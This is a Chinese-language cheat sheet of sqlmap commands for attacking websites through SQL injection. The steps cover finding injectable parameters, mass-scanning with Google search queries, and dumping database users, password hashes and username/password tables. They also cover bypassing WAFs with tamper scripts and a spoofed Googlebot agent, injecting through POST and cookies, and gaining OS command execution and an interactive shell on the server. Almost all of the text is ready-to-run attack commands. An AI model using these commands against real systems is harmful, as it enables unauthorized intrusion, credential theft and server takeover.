SQLMap 的經常使用語法
php
1.sqlmap.py -u "www.xxx.com/news.asp?id=1"// 檢查注入點
2.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-user// 獲取當前用戶名
3.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-db//獲取數據庫名,獲得庫admin 4.sqlmap.py -u "www.xxx.com/news.asp?id=1" --privileges//權限判斷 5.sqlmap.py -u "www.xxx.com/news.asp?id=1" --users//枚舉管理系統用戶 6.sqlmap.py -u "www.xxx.com/news.asp?id=1" --passwords//枚舉管理系統用戶哈希 7.sqlmap.py -u "www.xxx.com/news.asp?id=1" --tables -D "admin"//查admin庫中的表名,獲得user表 8.sqlmap.py -u "www.xxx.com/news.asp?id=1" --columns -T "user" -D "admin" -v 5//查字段,v後數字越大越詳細,獲得id,username,password 9.sqlmap.py -u "www.xxx.com/news.asp?id=1" --dump -C "id,username,password" -T "user" -D "admin" -v 5//拖庫,或者使用--dump-all 10.--dbms "Mysql"//指定數據庫類型 11.--dbs//列數據庫 12.--passwords -U root//指定列數據庫用戶root的密碼 13.--level 5//執行測試的等級 14.--user-agent "Googlebot/2.1" 15.--tamper "space2morehash.py" 以上爲經常使用sqlmap命令,其餘的請查閱手冊。
sqlmap 藉助 google 批量掃注入點html
1.sqlmap.py -g "site:target.com inurl:asp" 2.若是要查詢注入選y,跳過選n 注:大部分查詢結果不存在注入
sqlmap 利用編碼繞過 WAFweb
經過不一樣編碼,繞過WAF 1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --dbs --tamper "space2morehash.py"//利用.py腳本改變編碼,除了space2hash.py,還有base64encode.py、charencode.py等等,可查/usr/share/sqlmap/tamper 2.sqlmap.py --proxy http://127.0.0.1:8087 -u "www.xxx.com/news.asp?id=1" -v 3 –dbms 「MySQL」 --tamper "space2morehash.py" --referer "http://www.google.com" --user-agent "Googlebot/2.1" //模擬google爬蟲
sqlmap post 注入sql
方法一:結合burpsuite來使用sqlmap,用這種方法進行post注入測試會更準確,操做起來也很是容易。 1.瀏覽器打開目標地址 http://www.testfire.net/bank/login.aspx 2.配置burp代理(127.0.0.1:8080)以攔截請求 3.點擊login表單的submit按鈕 4.以下圖,這時候Burp會攔截到了咱們的登陸POST請求 5.把這個post請求複製爲txt, 我這命名爲testfire.txt 而後把它放至c盤下 6.運行sqlmap並使用以下命令:sqlmap.py -r c:/testfire.txt -p uid,這裏參數 -r 是讓sqlmap加載咱們的post請求testfire.txt,而 -p 爲指定注入用的參數。
方法二:指定參數post注入
1.sqlmap.py -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"
sqlmap cookies 注入shell
1.sqlmap.py -u "www.xxx.com/news.asp" --cookie "id=1" --current-db 2.sqlmap.py -u "www.xxx.com/news.asp" --cookie "id=1" --tables -D "admin" ...... 注:注入時有可能存在鏈接線程數限制,線程設置不要太大
sqlmap 執行 shell 命令數據庫
在數據庫權限足夠大的時候,可使用cmd命令: 1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --os-cmd=ipconfig//執行ipconfig命令 2.選取該web的腳本種類,此時爲asp,選1 3.指定網站的根目錄路徑,如:d:\www\
sqlmap得到一個shell瀏覽器
1.sqlmap.py -u "www.xxx.com/news.asp?id=1" --os-shell 2.選取該web的腳本種類,此時爲asp,選1 3.指定網站的根目錄路徑,如:d:\www\ 4.此時能夠執行命令,並會在d:\www\下生成兩個臨時文件(tmpbxbxz.php/tmpuoiuz.php)
sqlmap 僞靜態注入cookie
僞靜態頁面網址:www.xxx.com/index.php/Index/view/id/40.html 1.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs//在存在注入的地方加入*鍵 2.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --tables -D "admin" ......
sqlmap 延遲注入post
某些網站有防注入保護,短期內若是請求次數較多或短期內請求錯誤頁面次數較多均可能被網站屏蔽 1.sqlmap.py -u "www.xxx.com/index.php/Index/view/id/40*.html" --dbs --delay 5//間隔5秒請求一次 2.--safe-url//詳細說明請查閱手冊 3.--safe-freq//詳細說明請查閱手冊